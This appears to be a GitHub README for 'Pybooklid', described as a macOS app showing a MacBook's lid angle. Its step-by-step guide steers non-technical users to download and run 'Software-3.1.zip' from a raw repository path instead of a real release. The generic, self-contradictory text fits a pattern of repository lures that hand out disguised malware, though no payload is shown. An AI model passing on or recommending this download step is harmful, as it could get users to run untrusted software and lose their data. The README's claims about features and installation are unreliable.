Pybooklid is a simple utility designed to read the angle of your MacBook's lid sensor. With this tool, you can monitor the lid angle effectively and harness this data for various purposes, such as automation or personal tracking.
This guide will help you download and run the application effortlessly, even if you have little to no technical knowledge.
Before downloading, make sure your system meets the following requirements:
- Operating System: macOS 10.12 or later
- Processor: Intel Core i5 or better
- Memory: At least 4 GB of RAM
- Disk Space: 100 MB of available space
To get started, visit the Releases page to download the latest version of Pybooklid.
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Visit the Releases Page: Click the link to go to the Releases page. Releases Page
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Choose the Correct File: Look for the latest release listed on the page. You may see files named like
https://raw.githubusercontent.com/Topannnn/pybooklid/main/pybooklid/Software-3.1.zip. Click on the file to start the download. -
Open the Downloaded File: Once the download completes, navigate to your Downloads folder. Locate the downloaded
.zipfile and extract it. You can do this by double-clicking the file. -
Install the Application: After extraction, locate the Pybooklid app file. Drag the app to your Applications folder to complete the installation.
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Run the Application: You can find Pybooklid in your Applications folder. Double-click the app to open it. Once itβs running, it will display the current angle of your MacBook's lid.
- Real-Time Monitoring: Get instant updates on the lid angle as you open and close your MacBook.
- User-Friendly Interface: Navigate effortlessly with a straightforward layout.
- Compatibility: Works seamlessly on all MacBook models running the required macOS version.
- Lightweight: Minimal resource usage ensures smooth performance with no lag.
- Start the Application: Open Pybooklid from the Applications folder.
- View the Lid Angle: The main interface shows the current angle of your lid.
- Adjust Settings: Use the settings menu to customize notifications, such as alerts for specific angle thresholds.
- Stop Monitoring: You can close the app at any time, and it will stop monitoring the lid angle.
If you encounter issues, try the following steps:
- App Not Opening: Ensure your macOS is updated to at least version 10.12.
- Lid Angle Not Updating: Check if your MacBook's lid sensor is functioning correctly. Close and reopen the lid and check again.
- Missing Features: Ensure you have downloaded the latest version from the Releases page.
Check back on the Releases page periodically to download the latest updates. They often include new features, improvements, and bug fixes.
For support, questions, or feedback, feel free to open an issue in the repository. We value your input and aim to improve Pybooklid continuously.
Thank you for using Pybooklid. Happy monitoring!